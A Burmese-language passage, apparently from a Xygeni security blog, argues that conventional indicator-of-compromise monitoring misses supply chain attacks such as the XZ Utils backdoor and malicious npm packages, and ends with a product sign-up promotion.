အဖွဲ့များစွာသည် အားနည်းချက်ညွှန်ပြချက်များ၏တန်ဖိုးကို နားလည်ကြသော်လည်း၊ ၎င်းတို့သည် ဆာဗာများနှင့် ကွန်ရက်မှတ်တမ်းများမှ ထောက်လှမ်းမှုကိုသာ အားကိုးနေရဆဲဖြစ်သည်။ ထို့ကြောင့်၊ တိုက်ခိုက်သူများသည် ပုံမှန်ခြေရာများမကျန်ဘဲ build များကို အဆိပ်ခတ်နိုင်သည် သို့မဟုတ် malware ထည့်သွင်းနိုင်သည်။ ထို့ကြောင့် XZ Utils backdoor သို့မဟုတ် malicious npm package များကဲ့သို့သော ဖြစ်ရပ်များသည် ထုတ်လုပ်မှုအဆင့်သို့ မရောက်မချင်း မသိရှိနိုင်ခဲ့ပါ။

ဤကဲ့သို့သော ထောက်ပံ့ရေးကွင်းဆက် ညှိနှိုင်းမှုများကိုလည်း မီးမောင်းထိုးပြထားသည်- CISA ရဲ့ ထောက်ပံ့ရေးကွင်းဆက် လုံခြုံရေးလမ်းညွှန်ချက်တိုက်ခိုက်သူများသည် ပစ်မှတ်ထားလာကြောင်း သတိပေးသည် CI/CD pipelines နှင့် မှတ်ပုံတင်များ။

အဆိုပါ Takeaway

ရိုးရာ IOC ဆိုက်ဘာလုံခြုံရေးသည် လိုအပ်သော်လည်း မလုံလောက်ပါ။ အဓိကအားဖြင့် အဖွဲ့များသည် တိကျသော ညှိနှိုင်းမှုညွှန်းကိန်းများကို အသိအမှတ်ပြုရမည်။ CI/CD pipelines. ထိုအခါမှသာ ၎င်းတို့သည် အန္တရာယ်ရှိသော ကုဒ်ကို ရှာဖွေတွေ့ရှိနိုင်သည် သို့မဟုတ် pipeline အလွဲသုံးစားပြုမှုသည် ပတ်ဝန်းကျင်သို့ ပျံ့နှံ့မသွားမီ။

sca-tools-software-composition-analysis-tools
သင့်ဆော့ဖ်ဝဲလ်အန္တရာယ်များကို ဦးစားပေးသတ်မှတ်ခြင်း၊ ပြုပြင်ခြင်းနှင့် လုံခြုံစေခြင်း
သင့်ရဲ့ အခမဲ့အကောင့်ကို ရယူလိုက်ပါ။
အကြွေးဝယ်ကဒ်မရှိပါ။

သင့်ရဲ့ Software Development နဲ့ Delivery ကို လုံခြုံအောင်ထားပါ

Xygeni ထုတ်ကုန်အစုံနှင့်အတူ